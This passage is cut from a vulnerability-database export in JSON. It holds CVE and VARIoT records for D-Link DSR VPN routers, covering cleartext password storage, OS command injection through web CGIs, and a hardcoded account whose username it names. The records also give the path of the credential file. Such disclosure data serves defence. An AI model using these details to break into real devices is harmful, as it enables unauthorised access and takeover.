"value": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 stores account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#][\"Password\"] fields in /tmp/teamf1.cfg.ascii."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2013-12-19T01:57:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "30061",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "http://www.exploit-db.com/exploits/30061"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2013-7005",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 stores account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#][\"Password\"] fields in /tmp/teamf1.cfg.ascii."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "30061",
"refsource": "EXPLOIT-DB",
"url": "http://www.exploit-db.com/exploits/30061"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2013-7005",
"datePublished": "2013-12-19T02:00:00",
"dateReserved": "2013-12-07T00:00:00",
"dateUpdated": "2024-08-06T17:53:46.062Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2020-25759 (GCVE-0-2020-25759)
Vulnerability from cvelistv5
Published
2020-12-15 19:28
Modified
2024-08-04 15:40
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.dlink.com/en/security-bulletin | x_refsource_MISC | |
| https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195 | x_refsource_MISC | |
| https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T15:40:36.958Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-12-15T19:28:06",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2020-25759",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.dlink.com/en/security-bulletin",
"refsource": "MISC",
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"name": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195",
"refsource": "MISC",
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
},
{
"name": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/",
"refsource": "MISC",
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2020-25759",
"datePublished": "2020-12-15T19:28:06",
"dateReserved": "2020-09-18T00:00:00",
"dateUpdated": "2024-08-04T15:40:36.958Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
var-202012-0331
Vulnerability from variot
A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17. plural D-Link For routers made OS There are command injection vulnerabilities and input verification vulnerabilities.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202012-0331",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dsr-150n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-500ac",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "*"
},
{
"model": "dsr-1000n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-1000ac",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-250n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-250",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-150",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-500",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-1000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "3.17"
},
{
"model": "dsr-1000",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500ac",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-150n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-150",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000ac",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25757"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014726"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-500ac_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-500ac:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-500ac_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-500ac:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-1000ac_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-1000ac:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dsr-1000ac_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "3.17",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dlink:dsr-1000ac:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25757"
}
]
},
"cve": "CVE-2020-25757",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/severity#"
},
"@id": "https://www.variotdbs.pl/ref/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CVE-2020-25757",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.8,
"userInteractionRequired": false,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2020-25757",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2020-25757",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-25757",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202012-1107",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25757"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1107"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014726"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17. plural D-Link For routers made OS There are command injection vulnerabilities and input verification vulnerabilities.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25757"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014726"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-25757",
"trust": 2.4
},
{
"db": "DLINK",
"id": "SAP10195",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014726",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1107",
"trust": 0.6
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25757"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1107"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014726"
}
]
},
"id": "VAR-202012-0331",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.5056818
},
"last_update_date": "2021-12-17T04:57:47.164000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Unauthenticated\u00a0\u0026\u00a0Authenticated\u00a0Command\u00a0Injection\u00a0Vulnerabilities",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014726"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.0
},
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "Incorrect input confirmation (CWE-20) [NVD Evaluation ]",
"trust": 0.8
},
{
"problemtype": "OS Command injection (CWE-78) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25757"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014726"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10195"
},
{
"trust": 1.6,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"trust": 1.6,
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25757"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25757"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1107"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014726"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-25757"
},
{
"db": "CNNVD",
"id": "CNNVD-202012-1107"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-014726"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-12-15T20:15:00",
"db": "NVD",
"id": "CVE-2020-25757"
},
{
"date": "2020-12-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202012-1107"
},
{
"date": "2021-08-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-014726"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-21T11:39:00",
"db": "NVD",
"id": "CVE-2020-25757"
},
{
"date": "2020-12-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202012-1107"
},
{
"date": "2021-08-27T08:23:00",
"db": "JVNDB",
"id": "JVNDB-2020-014726"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202012-1107"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0D-Link\u00a0 In a router made by \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-014726"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202012-1107"
}
],
"trust": 0.6
}
}
var-201312-0289
Vulnerability from variot
D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username. plural D-Link Router product firmware is user name gkJ9232xXyruTRmY There is a vulnerability that can be obtained because it has a hard-coded account.An access right may be obtained by using the user name information by a third party. D-Link DSR is a wireless service router product developed by D-Link. D-Link DSR Router Series are prone to a security-bypass vulnerability. A trust management vulnerability exists in several D-Link products. The vulnerability stems from the fact that the program has a hard-coded user account named 'gkJ9232xXyruTRmY'. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
